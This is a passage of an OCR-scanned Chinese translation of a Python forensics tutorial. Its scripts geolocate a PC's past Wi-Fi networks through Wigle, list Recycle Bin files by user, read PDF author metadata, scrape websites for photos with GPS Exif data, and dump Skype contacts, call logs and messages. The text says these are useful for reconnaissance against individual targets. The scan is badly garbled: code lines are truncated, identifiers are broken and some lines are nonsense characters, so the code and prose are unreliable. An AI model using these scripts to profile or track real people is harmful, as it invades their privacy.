resp = browser.open(respURL, reqParams).read() 
mapLat = 'N/A' 
mapLon = 'N/A' 
rLat = re.findall(r'maplat=.*\&amp;', resp) 
if rLat: 
mapLat = rLat[0].split('&amp;')[0].split('=')[1] 
rLon = re.findall(r'maplon=.*\&amp;', resp) 


if rLon: 
mapLon = rLon[0].split 
print('[-] Lat: ' + mapLat + ', Lon: ' + mapLon) 


def printNets(username, password): 
net = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList 
key = _winreg.Openkey(_winreg.HKEY_LOCAL_MACHINE, net) 
print '\n[*] Networks You have Joined. ' 
for i in range(100): 
try: 
guid = _winreg.EnumKey(key, i) 
netKey = _winreg.OpenKey(key, str(guid) ) 
(n, addr, t) = _winreg.EnumValue(netKey, 5) 
(n, name, t) = _winreg.EnumValue(netKey, 4) 
macAddr = val2addr (addr) 
netName = str(name) 
print('[+] ' + netName + ' ' + macAddr) 
wiglePrint(username, password, macAddr ) 
_winreg.CloseKey(netKey) 
except: 
break 


def main(): 
parser = optparse.OptionParser("usage%prog -u <wigle username> 
parser.add_option('-u', dest='username', type='string', help='s 
parser.add_option('-p', dest='password', type='string', help=': 
(options, args) = parser.parse_args() 
username = options.username 
password = options.password 


if username == None or password == None: 
print(parser.usage) 
exit(0) 
else: 
printNets(username, password) 
if _name == '_ main_': 
main() 


i _ $ 


运行 我 们 的 新 脚本 ， 我 们 可 以 看 到 先前 连接 过 的 无 线 网 络 和 他 们 的 物理 位 置 。 知 道 
了 计算 机 在 哪 ， 让 我 们 在 下 一 节 检 查 一 下 回收 站 。 





C:\Users\investigator\Desktop\python discoverNetworks. py 
[*] Networks You have Joined. 

[+] Hooters_San_Pedro, 00:11:50:24:68:7F 

[-] Lat: 29.55995369, Lon: -98.48358154 

[+] LAX Airport, 00:30:65:03:e8:c6 

[-] Lat: 28.04605293, Lon: -82.60256195 

[+] Senate_public_wifi, 00:0b:85:23:23:3e 

[-] Lat: 44.95574570, Lon: -93.10277557 


用 Python 来 恢复 回收 站 中 删除 的 项 目 


在 微软 的 操作 系统 中 ， 回 收 站 作为 一 个 特殊 的 文件 夹 包 含 了 已 经 删除 的 文件 。 当 用 
户 通过 Windows Explorer 删 除 文件 时 ， 操 作 系 统 会 将 这 个 文件 移动 到 这 个 特殊 的 文 
件 夹 中 并 标记 这 文件 已 删除 ， 但 是 并 不 是 实际 上 的 删除 它们 。 在 Windows 98 和 更 
早 的 系统 中 用 的 是 FAT 文 件 系统 。 C:\Recycled\ 目录 保存 着 回收 站 目录 。 支 持 
NTFS 的 操作 系统 有 Windows NT，2000， 和 XP 存储 回收 站 在 C:\Recycler\ 目录 
下 。Windows Vista 和 Windows 7 系统 存储 在 C:\$Recycle.Bin 目录 下 。 


使 用 OS 模块 查找 已 删除 的 项 目 


为 了 让 我 们 的 脚本 不 依赖 与 特定 的 Windows 操 作 和 系统， 让 我 们 编写 一 个 函数 来 测试 
每 一 个 可 能 的 候选 目录 并 返回 系统 上 存在 的 第 一 个 目录 。 


import os 
def returnDir(): 
dirs = ['C:\\Recycler\\', 'C:\\Recycled\\', 'C:\\$Recycle.Bin\ 
for recycleDir in dirs: 
if os.path.isdir(recycleDir): 
return recycleDir 
return None 





在 发 现 回收 站 目录 之 后 ， 我 们 需要 检查 里 面 的 内 容 。 注意 两 个 子 目录 ， 它 们 都 包含 
字符 串 S-1-5-21-1275210071-1715567821-725345543- 并 终止 与 1005 或 者 
500。 这 个 字符 串 用 户 的 SID， 与 机 器 上 的 用 户 的 账户 一 一 相对 应 。 


C:\RECYCLER>dir /a 
Volume in drive C has no label. 
Volume Serial Number is 882A-6E93 
Directory of C:\RECYCLER 
04/12/2011 09:24 AM <DIR> 
04/12/2011 09:24 AM <DIR> 
04/12/2011 09:56 AM 
<DIR> S$-1-5-21-1275210071-1715567821- 
725345543 - 
1005 
04/12/2011 09:20 AM <DIR> S-1-5-21-1275210071-1715567821- 
725345543 - 
500 
© File(s) © bytes 
4 Dir(s) 30, 700,670,976 bytes free 


用 Python 将 用 户 的 SID 关 联 起 来 


我 们 将 使 用 Windows 注 册 表 将 SID 转 化 为 一 个 准确 的 用 户 名 。 通 过 检查 Windows 注 
册 表 键 

fi. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Pt 
， 我 们 可 以 看 到 它 返 回 一 个 

是 %SystemDrive%\Documents and Settings\<USERID> 。 在 下 图 中 ， 我 们 看 到 
这 允许 我 们 将 SID 为 S-1-5-21-1275210071-1715567821-725345543-1005 转化 
为 用 户 名 “alex”。 


C:\RECYCLER>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wind¢ 
ProfileImagePath 

! REG.EXE VERSION 3.0 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 
NT\CurrentVersion\ProfileList \S-1-5-21-1275210071-1715567821- 
725345543-1005 ProfileImagePath 

REG_EXPAND_SZ %SystemDrive%\Documents and Settings\alex 


了 -一 # 
我 们 想 知道 回收 站 里 谁 删除 了 什么 文件 。 让 我 们 编写 一 个 小 的 函数 来 将 每 一 个 SID 
转化 为 用 户 名 。 当 我 们 恢复 回收 站 中 被 删除 的 项 目 时 这 将 使 我 们 打印 更 多 有 用 的 输 
出 。 这 个 有 函数 将 打开 注册 便 检 查 ProfileImagePath 键 值 ， 找 到 其 值 并 从 中 找到 

用 户 名 。 





import _winreg 
def sid2user(sid): 
try: 
key = _winreg.OpenkKey(_winreg.HKEY_LOCAL_MACHINE, "SOFTWARE 
(value, type) = _winreg.QueryValueEx(key, 'ProfileImagePatt 
user = value.split('\\')[-1] 
return user 
except: 
return sid 








最 后 ， 我 们 将 所 有 的 代码 放 在 一 起 生成 一 个 脚本 ， 它 将 打印 已 删除 但 还 在 回收 站 中 
的 项 目 。 


# coding=UTF-8 


import os 
import _winreg 


def returnDir(): 
dirs = ['C:\\Recycler\\', 'C:\\Recycled\\', 'C:\\$Recycle.Bin\' 
for recycleDir in dirs: 
if os.path.isdir(recycleDir): 
return recycleDir 
return None 


def sid2user(sid): 

try: 
key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, "SOFTWARE 
(value, type) = _winreg.QueryValueEx(key, 'ProfileImagePatl 
user = value.split('\\')[-1] 
return user 

except: 
return sid 


def findRecycled(recycleDir): 

dirList = os.listdir(recycleDir) 

for sid in dirList: 
files = os.listdir(recycleDir + sid) 
user = sid2user(sid) 
print('\n[*] Listing Files For User: ' + str(user)) 
for file in files: 

print('[+] Found File: ' + str(file)) 


def main(): 
recycledDir = returnDir() 
findRecycled(recycledDir ) 


if name == ' _main_': 
main() 








在 目标 机 器 上 
alex。 它 列 出 
于 检查 那些 包 


运行 我 们 的 脚本 ， 我 们 看 到 脚本 发 现 了 两 个 用 户 : Administrator 和 
了 回收 站 中 每 个 用 户 的 文件 。 在 下 一 节 中 ， 我 们 将 审查 一 个 方法 ， 用 
含 在 调查 中 可 能 有 用 的 文件 的 内 部 内 容 。 


Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 
C:\>python dumpRecycleBin. py 

[*] Listing Files For User: alex 

[+] Found File: Notes_on_removing MetaData. pdf 
[+] Found File: ANONOPS_The_Press_Release. pdf 
[*] Listing Files For User: Administrator 

[+] Found File: 192.168.13.1-router-config.txt 
[+] Found File: Room_Combinations.xls 
C:\Documents and Settings\john\Desktop> 


元 数据 


在 本 节 中 ， 我 们 将 编写 一 个 脚本 用 来 从 文件 中 提取 元 数据 。 文 件 不 是 清晰 可 见 的 对 
象 ， 元 数据 可 以 存在 于 文档 ， 电 子 表 格 ， 图 像 ， 音 频 和 视频 等 文件 类 型 中 。 创 作 应 
用 程序 可 能 会 存储 一 些 细节 如 文件 的 作者 ， 创 建 和 修改 时 间 ， 潜 在 的 修订 和 注释 。 
例如 ， 拍 照 手 机 可 以 标记 本 地 的 GPS 在 照片 中 或 者 微软 的 Word 应 用 程序 可 以 存储 

文档 的 作者 。 检 查 每 一 个 文件 是 个 艰难 的 任务 ， 我 们 可 以 使 用 Python 自动 处 理 。 


Anonymeous 的 元 数据 失败 


2010 年 12 月 10 日 ， 黑 客 组 织 Anonymous 发 布 了 一 份 声 明 稿 ， 描 述 了 最 近 一 次 命名 
为 Operation Payback 攻 击 的 背后 的 动机 。 因 为 对 公司 不 支持 维基 解密 而 感到 愤 

起 ， 从 而 对 有 关公 司 进行 分 布 式 拒绝 服务 攻击 (DDOS) 报 复 。 黑 客 发 布 的 声明 稿 没 
有 签名 ， 没 有 来 源 。 是 一 个 PDF 文件 ， 但 是 发 行 时 包含 元 数据 。 被 创建 文档 的 程序 
添加 进 的 元 数据 包含 作者 的 名 字 Mr Alex Tapanaris ° JUAA > 728 4a T 4e o 


使 用 PyPDF 解 村 PDF 元 数据 


让 我 们 快速 创建 一 个 脚本 对 被 还 捕 的 黑客 组 织 Anonymous 的 成 员 用 过 的 文档 进行 法 
庭 调查 取证 。Wired.com 还 保留 着 ANONOPS_The_Press_Release.pdf 那 份 文档 。 
我 们 可 以 从 使 用 wget 下 载 这 份 文档 开始 。 


forensic:~# wget 

http://www.wired.com/images_blogs/threatlevel/2010/12/ANONOPS_The_ 
Press_Release. pdf 

--2012-01-19 11:43:36-- 

http://www.wired.com/images_blogs/threatlevel/2010/12/ANONOPS_The_ 
Press_Release. pdf 

Resolving www.wired.com... 64.145.92.35, 64.145.92.34 

Connecting to www.wired.com|64.145.92.35|:80... connected. 

HTTP request sent, awaiting response... 200 OK 

Length: 70214 (69K) [application/pdf ] 

Saving to: 'ANONOPS_The_Press_Release.pdf.1' 


================================>] 70, 214 364K/s in 0.2S 
2012-01-19 11:43:39 (364 KB/s) - 'ANONOPS_The_Press_Release.pdf' sé 
[70214/70214] 


[E 
PyPDF 是 一 个 优秀 的 第 三 方 管理 PDF 文件 很 实用 的 库 ， 可 以 从 网 站 


http://pybrary.net/pyPdf/ 获得 。 它 提供 了 文档 的 信息 提取 ， 分 割 ， 合 并， 加 审 和 解 
蜜 的 能 力 。 为 了 提取 元 数据 ， 我 们 使 用 函数 getDocumentInfo() 。 这 个 方法 返回 
一 个 元 组 数组 ， 每 一 个 元 组 包含 一 个 元 数据 元 素 和 它 的 值 。 遍 历 这 个 数组 并 打印 
PDF 文件 的 全 部 元 数据 。 





import pyPdf 
from pyPdf import PdfFileReader 


def printMeta(fileName): 
pdfFile = PdfFileReader(file(fileName, 'rb')) 
docInfo = pdfFile.getDocumentInfo( ) 
print('[*] PDF MetaData For: ' + str(fileName) ) 
for metaItem in docInfo: 
print('[+] ' + metaItem + ':' + docInfo[metaItem] ) 


MS Aa— ADM ERB BAF CA TH? KN A-PLAAVARBRAZIPDEP 4 
元 数据 。 同 样 ， 我 们 可 以 修改 我 们 的 脚本 来 测试 特定 的 元 数据 ， 例 如 特定 的 用 户 。 
当然 ， 这 有 可 能 帮助 执法 管 来 搜索 文件 来 列 出 作者 名 字 。 


# coding=UTF-8 

import pyPdf 

from pyPdf import PdfFileReader 
import optparse 


def printMeta(fileName): 
pdfFile = PdfFileReader(file(fileName, 'rb')) 
docInfo = pdfFile.getDocumentInfo() 
print('[*] PDF MetaData For: ' + str(fileName) ) 
for metaItem in docInfo: 
print('[+] ' + metaItem + ':' + docInfo[metaItem] ) 
def main(): 
parser = optparse.OptionParser('usage %prog -F <PDF file name> 
parser.add_option('-F', dest='fileName', type='string', help=': 
(options, args) = parser.parse_args() 
fileName = options.fileName 


if fileName == None: 
print(parser.usage) 
exit(0) 
else: 
printMeta( fileName) 
if _name__ == ' main_': 
main() 


ic = z 


44 Anonymous È Ai 49 E A A ZRNA > RATT AA E) AE) URE GE 
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forensic:~# python pdfRead.py -F ANONOPS_The_Press_Release. pdf 
[*] PDF MetaData For: ANONOPS_The_Press_Release. pdf 

[+] /Author:Alex Tapanaris 

[+] /Producer:OpenOffice.org 3.2 

[+] /Creator:Writer 

[+] /CreationDate:D:20101210031827+02'00' 


理解 Exif 元 数据 


(Exif 是 一 种 图 象 文件 格式 ， 它 的 数据 存储 与 JPEG 格 式 是 完全 相同 的 。 实 际 上 Exif 格 
式 就 是 在 JPEG 格 式 头 部 插入 了 数码 照片 的 信息 ， 包 括 拍 摄 时 的 光圈 、 快 门 、 白 平 
衔 、ISO、 焦 距 、 日 期 时 间 等 各 种 和 拍摄 条 件 以 及 相机 品牌 、 型 号 、 色 彩 编 码 、 拍 
摄 时 录制 的 声音 以 及 全 球 定 位 系统 (GPS) 、 缩 略图 等 。 简 单 地 

说 ， Exif=JPEG+ 拍 摄 参 数 。 因 此 ， 你 可 以 利用 任何 可 以 查看 JPEG 文 件 的 看 图 软 
件 浏览 Exif 格 式 的 照片 ， 但 并 不 是 所 有 的 图 形 程序 都 能 处 理 Exif 信 息 。) 


交换 图 像 文 件 格式 (Exif) 标 准 的 定义 了 如 何 存储 图 像 和 视频 文件 的 规范 。 如 数码 相 
机 ， 扫 描 仪 和 智能 手机 使 用 这 个 标准 来 保存 图 像 和 视频 文件 。Exif 标 准 文件 包含 了 
几 个 对 法 庭 调查 取证 有 用 的 信息 。Phil Harvey 编 写 了 一 个 实用 的 工具 名 叫 


exiftool( 从 http://www.sno.phy.queensu. pa esta 可 获得 ) 能 解析 这 些 参数 o 
检查 所 有 的 Exif 参 数 可 能 会 返回 几 页 的 信息 ， 所 以 我 们 只 检查 部 分 需要 的 参数 信 

息 。 包含 相机 型 号 名 称 iPhone 4S 以 及 图 像 实际 的 GPS 经 纬度 坐标 。 
些 信 息 在 组 织 图 像 是 很 有 帮助 的 。 比 如 说 ，Mac OS X 应 用 程序 iPhoto 使 用 位 置信 息 
来 整齐 的 排列 世界 地 图 上 的 照片 。 然 而 ， 这 些 信息 也 被 大 量 的 恶意 的 使 用 。 想 象 一 
个 士兵 将 Exif 照 片 放 到 博客 或 网 站 上 ， 敌 人 可 以 下 载 所 有 的 照片 几 秒 钟 之 类 便 可 以 
知道 士兵 的 调动 信息 。 在 下 面 的 章节 中 ， 我 们 将 建立 一 个 脚本 来 连接 WEB 网 站 ， 下 
载 图 像 ， 并 检查 他 们 的 Exif 元 数据 。 


investigator$ exiftool photo. JPG 

ExifTool Version Number : 8.76 

File Name : photo.JPG 

Directory : /home/investigator/photo. JPG 
File Size : 1626 kB 

File Modification Date/Time : 2012:02:01 08:25:37-07:00 
File Permissions : rw-r--r-- 

File Type : JPEG 

MIME Type : image/jpeg 

Exif Byte Order : Big-endian (Motorola, MM) 
Make 

: Apple 

Camera Model Name : iPhone 4S 

Orientation : Rotate 90 CW 

<..SNIPPED. .> 

GPS Altitude : 10 m Above Sea Level 

GPS Latitude : 89 deg 59' 59.97" N 

GPS Longitude : 36 deg 26' 58.57" W 
<..SNIPPED. .> 


使 用 BeautifulSoup 下 载 图 像 


可 以 从 www.crummy.com/software/BeautifulSoup/ 获 
得 BeautifulSoup ° BeautifulSoup 允许 我 们 快速 的 解析 HTML 和 XML X 
档 。 更 新 BeautifulSoup 到 最 新 版 本 ， 并 使 用 easy_install RR 


ak 


X BeautifulSoup Æ ° 


investigator:~# easy_install beautifulsoup4 

Searching for beautifulsoup4 

Reading http://pypi.python.org/simple/beautifulsoup4/ 
<,..SNIPPED. ,> 

Installed /usr/local/lib/python2.6/dist-packages/beautifulsoup4-4.: 
Processing dependencies for beautifulsoup4 

Finished processing dependencies for beautifulsoup4 


ai Si 








在 本 节 中 ， 我 们 将 使 用 BeautifulSoup 来 抓 取 HTML 文档 的 内 容 来 获取 文档 中 所 
有 的 图 像 。 注 意 ， 我 们 使 用 urllib2 打开 文档 并 读 取 它 。 接 下 来 我 们 可 以 创 

造 BeautifulSoup 对 象 或 者 一 个 包含 不 同 HTML 文档 对 象 的 解析 树 。 用 这 样 的 对 
象 ， 我 么 可 以 提取 所 有 的 图 像 标签 ， 通 过 使 用 findall('img') 函数， 这 个 函数 
返回 一 个 包含 所 有 图 像 标签 的 数组 。 


import urllib2 

from bs4 import BeautifulSoup 

def findImages(url): 
print('[+] Finding images on ' + url) 
urlContent = urllib2.urlopen(url).read() 
soup = BeautifulSoup(urlContent ) 
imgTags = soup.findAll('img' ) 
return imgTags 


接 下 来 ， 我 们 需要 从 网 站 中 下 载 每 一 个 图 像 ， 然 后 在 单独 的 函数 中 进行 检查 。 为 了 

下 载 图 像 ， 我 们 将 用 到 urllib2 ， urlparse 和 os 模块 。 首 先 ， 我 们 从 图 像 

标签 中 提取 源 地 址 ， 接 着 我 们 读 取 图 像 的 二 进 制 内 容 到 一 个 变量 ， 最 后 我 们 以 写 -二 
进 制 模式 打开 文件 将 图 像 内 容 写 入 文件 。 


import urllib2 
from urlparse import urlsplit 
from os.path import basename 
def downloadImage(imgTag): 
try: 
print('[+] Dowloading image...') 
imgSrc = imgTag['src' ] 
imgContent = urllib2.urlopen(imgSrc).read() 
imgFileName = basename(urlsplit(imgSrc)[2]) 
imgFile = open(imgFileName, 'wb') 
imgFile.write(imgContent ) 
imgFile.close() 
return imgFileName 
except: 
return 


使 用 Python 的 图 像 库 从 图 像 阅 读 Exif 元 数据 为 了 测试 图 像 的 内 容 特 到 Exif 元 数据 ， 
我 们 将 使 用 Python 图 像 库 PIL 来 处 理 文件 ， 可 以 从 
hitp://www.pythonware.com/products/pil/ 获得 ， 以 增加 Python 的 图 像 处 理 能 力 ， 
并 允许 我 们 快速 的 提取 与 地 理 位 置 相关 的 元 数据 信息 。 为 了 测试 文件 元 数据 ， 我 们 
将 打开 的 对 象 作为 PIL 图 像 对 象 并 使 用 函数 getexif() 。 接 下 来 我 们 解析 Exif 
数据 到 一 个 数组 ， 通 过 元 数据 类 型 索引 。 数 组 完成 后 ， 我 们 可 以 搜索 数组 看 看 它 是 
否 包含 有 GPSInfo 的 Exif 参数 。 如 果 它 包含 GPSInfo 参数 ， 我 们 就 知道 对 象 包 
GPS 元 数据 并 打印 信息 到 屏幕 上 。 


from PIL import Image 
from PIL.ExifTags import TAGS 
def testForExif(imgFileName) : 
try: 
exifData = {} 
imgFile = Image.open(imgFileName) 
info = imgFile._getexif() 
if info: 
for (tag, value) in info.items(): 
decoded = TAGS.get(tag, tag) 
exifData[decoded] = value 
exifGPS = exifData['GPSInfo'] 
if exifGPS: 
print('[*] ' + imgFileName + ' contains GPS MetaDat 
except: 
Pass 


ee 
将 所 有 的 包装 在 一 起 ， 我 们 的 脚本 现在 可 以 连接 到 一 个 URL 地 址 ， 解 析 并 下 载 所 有 
的 图 像 文件 ， 然 后 测试 每 个 文件 的 Exif 元 数据 。 注 意 main() 函数 中 ， 我 们 首先 获 


取 站 点 上 的 所 有 图 像 的 列表 ， 然 后 对 数组 中 的 每 一 个 图 像 ， 我 们 将 下 载 图 像 并 测试 
它 的 GPS 元 数据 。 





# coding=UTF-8 
import urllib2 
import optparse 
from bs4 import BeautifulSoup 
from urlparse import urlsplit 
from os.path import basename 
from PIL import Image 
from PIL.ExifTags import TAGS 
def findImages(url): 
print('[+] Finding images on ' + url) 
urlContent = urllib2.urlopen(url).read() 
soup = BeautifulSoup(urlContent ) 
imgTags = soup.findAll('img' ) 
return imgTags 
def downloadImage(imgTag): 
try: 
print('[+] Dowloading image...') 
imgSrc = imgTag['src' ] 
imgContent = urllib2.urlopen(imgSrc).read() 
imgFileName = basename(urlsplit(imgSrc)[2]) 
imgFile = open(imgFileName, 'wb') 
imgFile.write(imgContent ) 
imgFile.close() 
return imgFileName 
except: 
return 
def testForExif (imgFileName) : 


try: 
exifData = {} 
imgFile = Image. open(imgFileName) 
info = imgFile._getexif() 
if info: 
for (tag, value) in info.items(): 
decoded = TAGS.get(tag, tag) 
exifData[decoded] = value 
exifGPS = exifData['GPSInfo'] 
if exifGPS: 
print('[*] ' + imgFileName + ' contains GPS MetaData') 
except: 
pass 
def main(): 
parser = optparse.OptionParser('usage%prog -u <target url>') 
parser.add_option('-u', dest='url', type='string', help='specił 
(options, args) = parser.parse_args() 
url = options.url 
if url == None: 
print(parser.usage) 
exit (0) 
else: 
imgTags = findImages(url) 
for imgTag in imgTags: 
imgFileName = downloadImage(imgTag) 
testForExif (imgFileName) 
if _name == '_ main_': 
main() 





对 目标 地 址 测试 刚刚 生成 的 脚本 ， 我 们 可 以 看 到 其 中 一 个 图 像 包 含 GPS 元 数据 信 
息 。 这 个 能 用 于 对 个 人 目标 的 进攻 侦查 ， 我 们 也 可 以 使 用 此 脚本 来 确认 我 们 自己 的 
漏洞 ， 在 黑客 攻击 前 。 


forensics: # python exifFetch.py -u http://www. flickr.com/photos/d\ 
[+] Finding images on http://www. flickr.com/photos/dvids/499900192! 
[+] Dowloading image... 

[+] Dowloading image... 

[+] Dowloading image... 

[*] 4999001925 ab6da92710_0.jpg contains GPS MetaData 

[+] Dowloading image... 

[+] Dowloading image... 

[+] Dowloading image... 


E —— 





用 Python 调查 应 用 程序 结构 


这 一 节 我 们 将 讨论 应 用 程序 结构 ， 即 两 个 流行 的 应 用 程序 存储 在 SQLite 数据 库 中 的 
数据 。SQLite 数据 库 在 几 个 不 同 的 应 用 程序 中 是 很 流行 的 选择 ， 对 于 local/client 4 
储 类 型 来 说 。 尤 其 是 WEB 浏览 器 ， 因 为 与 编程 语言 不 相关 绑 定 。 与 其 相对 应 的 
client/server 关系 数据 库 ，SQLite 数据 库存 储 整 个 数据 库 在 主机 上 作为 单个 文件 。 
最 初 由 Dr. Richard Hipp 在 美国 海军 工作 时 创立 ，SQLite 数据 库 在 许多 流行 的 应 用 
程序 中 的 使 用 不 断 的 增长 。 被 Apple > Mozilla > Google > McAfee ， 
MicrosoftMircso，lntuit， 通 用 电气 ，DropBox，AdobeAdro # 2 Airbus 等 公司 
内 建 到 应 用 程序 中 使 用 SQLite 数据 库 格 式 。 了 解 如 何 解析 SQLite 数据 库 并 在 法 庭 
调查 取证 中 使 用 Python 自动 处 理 是 非常 有 用 的 。 下 一 节 的 开始 ， 我 们 将 利用 流行 的 
语音 聊天 客户 端 Skype 来 审查 SQLite 数据 库 。 


了 解 Skype SQLite3 数据 库 


作为 4.0 版 本 ， 流 行 的 聊天 工具 Skype 改变 了 它 的 内 部 数据 库 格 式 ， 使 用 SQLite 格 
式 。 在 Windows 系统 中 ，Skype 存储 了 的 一 个 名 叫 main.db 的 数据 库 在 路 

径 C:\Documents and Settings\<User>\ApplicationData\Skype\<Skypeaccot 
目录 下 ， 在 MAC OS X 系统 中 ， 相 同 的 数据 库 放 

在 /Users/<User>/Library/Application\ Support/Skype/<Skype-account> 
目录 下 。 但 是 Skype 存储 了 什么 在 该 数据 库 中 ?为 了 更 好 的 了 解 Skype SQLite 数 
据 库 信息 的 模式 ， 让 我 们 使 用 sqlite3 命令 行 工 具 快速 的 连接 到 数据 库 。 连 接 

后 ， 我 们 执行 命令 : 


SELECT tbl_name FROM sqlite_master WHERE type=="table”; 


SQLite 数据 库 维护 了 一 个 表 名 为 sqlite master ， 这 个 表 包 含 了 列 名 

为 tbl_name ， 用 来 描述 数据 库 中 的 每 一 个 表 。 执 行 这 名 SELECT 语句 允许 我 们 
查看 Skype 的 main.db 数据 库 中 的 表 。 我 们 可 以 看 到 ， 该 数据 库 保 存 的 表 包 含 电 
话 ， 账 户 ， 消 息 其 至 是 SMS 消息 的 信息 。 


investigator$ sqlite3 main.db 

SQLite version 3.7.9 2011-11-01 00:52:41 
Enter ".help" for instructions 

Enter SQL statements terminated with a ";" 
sqlite> SELECT tbl_name FROM sqlite_master WHERE type=="table"; 
DbMeta 

Contacts 

LegacyMessages 

Calls 

Accounts 

Transfers 

Voicemails 

Chats 

Messages 

ContactGroups 

Videos 

SMSes 

CallMembers 

ChatMembers 

Alerts 

Conversations 

Participants 


账户 表 使 用 Skype 应 用 程序 账户 的 信息 。 它 包含 的 列 包 括 用 户 的 名 字 ，Skype 的 简 
介 名 称 ， 用 户 的 位 置 ， 账 户 的 创建 日 期 等 信息 。 为 了 查询 这 些 信息 ， 我 们 可 以 创建 
一 个 SQL 语句 选择 这 些 列 。 注 意 ， 数 据 库 存储 在 UNIX 时 间 日 期 要 求 转化 为 更 友好 
的 格式 。UNIX 时 间 日 期 提供 了 一 个 简单 的 测量 时 间 方 式 。 它 将 日 期 简单 的 记录 为 
自 1970 年 1 月 1 日 来 的 秒 数 的 整数 值 。SQL 函数 datatime() 可 以 将 这 种 值 转化 
为 易 懂 的 格式 。 


sqlite> SELECT fullname, skypename, city, country, 
datetime(profile_ 

timestamp, 'unixepoch') FROM accounts; 

TJ OConnor|<accountname>|New York|us|22010-01-17 16:28:18 


使 用 Python 的 Sqlite3 自动 完成 Skype 数据 库 查 询 


连接 数据 库 并 执行 一 个 SELECT 语句 很 容易 ， 我 们 希望 能 够 自动 的 处 理 数据 库 中 
几 个 不 同 的 表 和 列 中 的 额外 的 信息 。 让 我 们 利用 sqlite3 库 来 编写 一 个 小 的 
Python 程序 来 完成 这 些 。 注 意 我 们 的 函数 printProfile() ， 它 创建 一 个 

到 main.db 数据 库 的 连接 ， 创 建 一 个 连接 之 后 ， 它 需要 一 个 光标 提示 然后 执行 我 
们 先前 的 SELECT 744) > SELECT 语句 的 结果 返回 一 个 包含 数组 的 数组 。 对 于 每 
个 返回 的 结果 ， 它 包含 用 户 ，Skype 用 户 名 ， 位 置 和 介绍 数据 的 索引 列 。 我 们 解释 
这 些 结果 ， 然 后 漂亮 的 打印 他 们 到 屏幕 上 。 


# coding=UTF-8 

import sqlite3 

def printProfile(skypeDB): 

conn = sqlite3.connect(skypeDB) 

c = conn.cursor() 

c.execute("SELECT fullname, skypename, city, country, 
datetime(profile_ timestamp, 'unixepoch') FROM Accounts;") 
for row in c: 

print('[*] -- Found Account --') 

print('[+] User: '+str(row[0])) 

print('[+] Skype Username: '+str(row[1])) 

print('[+] Location: '+str(row[2])+', '+str(row[3]) ) 
print('[+] Profile Date: '+str(row[4])) 

def main(): 

skypeDB = "main.db" 

printProfile(skypeDB) 

if _name == "_ main_": 

main() 


运行 我 们 的 脚本 ， 我 们 看 到 ，Skype 的 main.db 数据 库 包 含 了 一 个 用 户 账户 ， 处 
于 隐私 的 问题 ， 我 们 用 <accountname> 代替 真正 的 用 户 名 。 


investigator$ python printProfile.py 
[*] -- Found Account -- 

[+] User: TJ OConnor 

[+] Skype Username : <accountname> 

[+] Location : New York, NY,us 

[+] Profile Date : 2010-01-17 16:28:18 


让 我 们 通过 检查 存储 的 联系 人 地 址 进一步 调查 Skype 的 数据 库 。 注 意 ， 联 系 表 存储 
信息 如 显示 名 ，Skype 用 户 名 ， 位 置 ， 移 动 电话 ， 甚 至 是 生日 等 每 一 个 联系 都 存储 
在 数据 库 中 。 所 有 这 些 个 人 信息 当 我 们 调查 或 者 是 攻击 一 个 目标 时 都 是 有 用 的 ， 所 
以 我 们 将 信 息 收 集 起 来 。 让 我 们 输出 SELECT 语句 返回 的 信息 ， 注 意 几 个 字段 ， 
比如 生日 可 能 是 null ， 在 这 种 情况 下 ， 我 们 利用 条 件 语句 只 打印 不 等 于 空 的 结 
果 o 


def printContacts(skypeDB) : 
conn = sqlite3.connect(skypeDB) 
c = conn.cursor() 
c.execute("SELECT displayname, skypename, city, country, phone. 
for row inc: 


print('\n[*] -- Found Contact --') 
print('[+] User : ' + str(row[0])) 
print('[+] Skype Username : ' + str(row[1])) 
if str(row[2]) != '' and str(row[2]) != 'None': 
print('[+] Location : ' + str(row[2]) + ',' + str(row[: 
if str(row[4]) != 'None': 
print('[+] Mobile Number : ' + str(row[4])) 
if str(row[5]) != 'None': 
print('[+] Birthday : ' + str(row[5])) 
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直到 现在 我 们 只 是 从 特定 的 表 中 提取 特定 的 列 检查 。 然 而 ， 当 我 们 想 将 两 个 表 中 的 
信息 一 起 输出 怎么 办 ?在 这 种 情况 下 ， 我 们 不 得 不 将 唯一 标识 结果 的 值 加 入 数据 库 
表 中 。 为 了 说 明 这 一 点 ， 我 们 来 探 完 如 何 输 出 存储 在 Skype 数据 库 中 的 通话 记录 。 
为 了 输出 详细 的 Skype 通话 记录 ， 我 们 需要 同时 使 用 通话 表 和 联系 表 。 通 话 表 维护 
着 通话 的 时 间 惟 和 和 每 个 通话 的 唯一 索引 字段 名 为 conv_dbid 。 联 系 表 维护 了 通 
话 者 的 身份 和 每 一 个 电话 的 ID 列 明 为 id。 因 此， 为 了 连接 两 个 表 我 们 需要 查询 

的 SELECT 语句 有 田 条 件 语句 WHERE calls.conv_dbid = conversations .id 
来 确认 。 这 条 语句 的 结果 返回 包含 所 有 存储 在 Skype 数据 库 中 的 Skype 的 通话 记录 
时 间 和 身份 。 





def printCallLog(skypeDB): 
conn = sqlite3.connect(skypeDB) 
c = conn.cursor() 
c.execute("SELECT datetime(begin_timestamp, 'unixepoch'), 
identity FROM calls, conversations WHERE calls.conv_dbid = 
conversations.id;") 
print('\n[*] -- Found Calls --') 
for row in c: 
print('[+] Time: '+str(row[0]) + ' | Partner: ' + str(row[: 


a 





让 我 们 添加 最 后 一 个 函数 来 完成 我 们 的 脚本 。 证 据 丰 富 ，Skype 数据 库 实际 默认 包 
含 了 所 有 用 户 发 送 和 接受 的 信息 。 存 储 这 些 信息 的 为 Message 表 。 从 这 个 表 ， 我 
们 将 执 

f SELECT the timestamp, dialog_partner, author, and body_xml(raw te) 
语句 。 注 意 ， 如 果 作 者 来 子 不 同 的 dialog_partner ， 数 据 库 的 拥有 者 发 送 初 始 
化 信息 到 dialog_partner 。 和 否则 ， 如 果 作 者 和 dialog_partner 相 

F] > dialog_partner 初始 化 这 些 信 息 ， 我 们 将 从 dialog_partner 打印 。 


def 
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printMessages(skypeDB): 
conn = sqlite3.connect(skypeDB) 
c = conn.cursor() 
c.execute( "SELECT datetime(timestamp, 'unixepoch'), dialog_partr 
print('\n[*] -- Found Messages --') 
for row in c: 
try: 
